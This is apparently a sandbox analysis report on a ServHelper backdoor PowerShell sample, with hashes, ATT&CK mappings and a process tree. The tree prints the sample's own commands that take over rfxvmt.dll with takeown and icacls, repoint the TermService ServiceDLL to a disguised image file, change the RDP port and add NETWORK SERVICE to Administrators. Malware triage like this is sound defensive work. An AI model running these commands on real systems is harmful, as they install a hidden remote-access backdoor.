servhelper | b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5

Analysis

max time kernel
171s
max time network
184s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
08-02-2022 02:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1
Size

3.8MB
MD5

213d018805394eb6e12f57005f1d45e0
SHA1

b01887dc649cb1209abdad8ce9ea59ec33d1c6b2
SHA256

b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5
SHA512

c0334c5e90c3e5edd09c9ac7a7c5792bcdf43b4fd9362e5c573d6f0729d5c71db611967a9d5c417d430575a951e6270d7049879711db1a38598a2f16d486233c

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
3408	icacls.exe
4460	icacls.exe
4428	icacls.exe
2756	icacls.exe
4012	takeown.exe
180	icacls.exe
4716	icacls.exe
3496	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000900000001e8cc-167.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
4888	Process not Found
4888	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2756	icacls.exe
4012	takeown.exe
180	icacls.exe
4716	icacls.exe
3496	icacls.exe
3408	icacls.exe
4460	icacls.exe
4428	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4448	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1504	powershell.exe
1504	powershell.exe
1780	powershell.exe
1780	powershell.exe
3128	powershell.exe
3128	powershell.exe
3836	powershell.exe
3836	powershell.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
668	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeShutdownPrivilege	3744	svchost.exe
Token: SeCreatePagefilePrivilege	3744	svchost.exe
Token: SeRestorePrivilege	4716	icacls.exe
Token: SeSecurityPrivilege	3128	TiWorker.exe
Token: SeRestorePrivilege	3128	TiWorker.exe
Token: SeBackupPrivilege	3128	TiWorker.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1504 wrote to memory of 1780	1504	powershell.exe	85
PID 1504 wrote to memory of 1780	1504	powershell.exe	85
PID 1504 wrote to memory of 3128	1504	powershell.exe	89
PID 1504 wrote to memory of 3128	1504	powershell.exe	89
PID 1504 wrote to memory of 3836	1504	powershell.exe	91
PID 1504 wrote to memory of 3836	1504	powershell.exe	91
PID 1504 wrote to memory of 4012	1504	powershell.exe	107
PID 1504 wrote to memory of 4012	1504	powershell.exe	107
PID 1504 wrote to memory of 180	1504	powershell.exe	108
PID 1504 wrote to memory of 180	1504	powershell.exe	108
PID 1504 wrote to memory of 4716	1504	powershell.exe	109
PID 1504 wrote to memory of 4716	1504	powershell.exe	109
PID 1504 wrote to memory of 3496	1504	powershell.exe	110
PID 1504 wrote to memory of 3496	1504	powershell.exe	110
PID 1504 wrote to memory of 3408	1504	powershell.exe	111
PID 1504 wrote to memory of 3408	1504	powershell.exe	111
PID 1504 wrote to memory of 4460	1504	powershell.exe	112
PID 1504 wrote to memory of 4460	1504	powershell.exe	112
PID 1504 wrote to memory of 4428	1504	powershell.exe	113
PID 1504 wrote to memory of 4428	1504	powershell.exe	113
PID 1504 wrote to memory of 2756	1504	powershell.exe	114
PID 1504 wrote to memory of 2756	1504	powershell.exe	114
PID 1504 wrote to memory of 3168	1504	powershell.exe	115
PID 1504 wrote to memory of 3168	1504	powershell.exe	115
PID 1504 wrote to memory of 4448	1504	powershell.exe	116
PID 1504 wrote to memory of 4448	1504	powershell.exe	116
PID 1504 wrote to memory of 3620	1504	powershell.exe	117
PID 1504 wrote to memory of 3620	1504	powershell.exe	117
PID 1504 wrote to memory of 4616	1504	powershell.exe	119
PID 1504 wrote to memory of 4616	1504	powershell.exe	119
PID 4616 wrote to memory of 3664	4616	net.exe	120
PID 4616 wrote to memory of 3664	4616	net.exe	120
PID 1504 wrote to memory of 972	1504	powershell.exe	121
PID 1504 wrote to memory of 972	1504	powershell.exe	121
PID 972 wrote to memory of 1996	972	cmd.exe	122
PID 972 wrote to memory of 1996	972	cmd.exe	122
PID 1996 wrote to memory of 1184	1996	cmd.exe	123
PID 1996 wrote to memory of 1184	1996	cmd.exe	123
PID 1184 wrote to memory of 1216	1184	net.exe	124
PID 1184 wrote to memory of 1216	1184	net.exe	124
PID 1504 wrote to memory of 1728	1504	powershell.exe	125
PID 1504 wrote to memory of 1728	1504	powershell.exe	125
PID 1728 wrote to memory of 2720	1728	cmd.exe	126
PID 1728 wrote to memory of 2720	1728	cmd.exe	126
PID 2720 wrote to memory of 768	2720	cmd.exe	127
PID 2720 wrote to memory of 768	2720	cmd.exe	127
PID 768 wrote to memory of 3488	768	net.exe	128
PID 768 wrote to memory of 3488	768	net.exe	128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b4b4e78ce6633cc8662dfde524de61a8bdfdc92c0f69fb9e3d68f6f34597dde5.ps1
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\system32\takeown.exe
  "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4012
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:180
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3496
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3408
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4460
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4428
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2756
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  2⤵
  PID:3168
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  2⤵
  - Modifies registry key
  PID:4448
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  2⤵
  PID:3620
- C:\Windows\system32\net.exe
  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:3664
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\system32\net.exe
      net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        5⤵
        
        PID:1216
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\system32\net.exe
      net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        5⤵
        
        PID:3488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3128

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1504-136-0x0000027BF6570000-0x0000027BF677A000-memory.dmp

Filesize
2.0MB

Download
memory/1504-134-0x0000027BF3A76000-0x0000027BF3A78000-memory.dmp

Filesize
8KB

Download
memory/1504-135-0x0000027BF61E0000-0x0000027BF6356000-memory.dmp

Filesize
1.5MB

Download
memory/1504-133-0x0000027BF3A73000-0x0000027BF3A75000-memory.dmp

Filesize
8KB

Download
memory/1504-132-0x0000027BF3A70000-0x0000027BF3A72000-memory.dmp

Filesize
8KB

Download
memory/1504-130-0x0000027BDA040000-0x0000027BDA062000-memory.dmp

Filesize
136KB

Download
memory/1504-131-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/1780-137-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/1780-139-0x000002B7F6BA3000-0x000002B7F6BA5000-memory.dmp

Filesize
8KB

Download
memory/1780-138-0x000002B7F6BA0000-0x000002B7F6BA2000-memory.dmp

Filesize
8KB

Download
memory/1780-140-0x000002B7F6BA6000-0x000002B7F6BA8000-memory.dmp

Filesize
8KB

Download
memory/3128-142-0x000001D9245C0000-0x000001D9245C2000-memory.dmp

Filesize
8KB

Download
memory/3128-143-0x000001D9245C3000-0x000001D9245C5000-memory.dmp

Filesize
8KB

Download
memory/3128-144-0x000001D9245C6000-0x000001D9245C8000-memory.dmp

Filesize
8KB

Download
memory/3128-141-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/3744-149-0x000001BA2E160000-0x000001BA2E170000-memory.dmp

Filesize
64KB

Download
memory/3744-156-0x000001BA30EE0000-0x000001BA30EE4000-memory.dmp

Filesize
16KB

Download
memory/3836-145-0x00007FFCFFBB0000-0x00007FFD00671000-memory.dmp

Filesize
10.8MB

Download
memory/3836-147-0x0000025573DB0000-0x0000025573DB2000-memory.dmp

Filesize
8KB

Download
memory/3836-146-0x0000025573DB6000-0x0000025573DB8000-memory.dmp

Filesize
8KB

Download
memory/3836-148-0x0000025573DB3000-0x0000025573DB5000-memory.dmp

Filesize
8KB

Download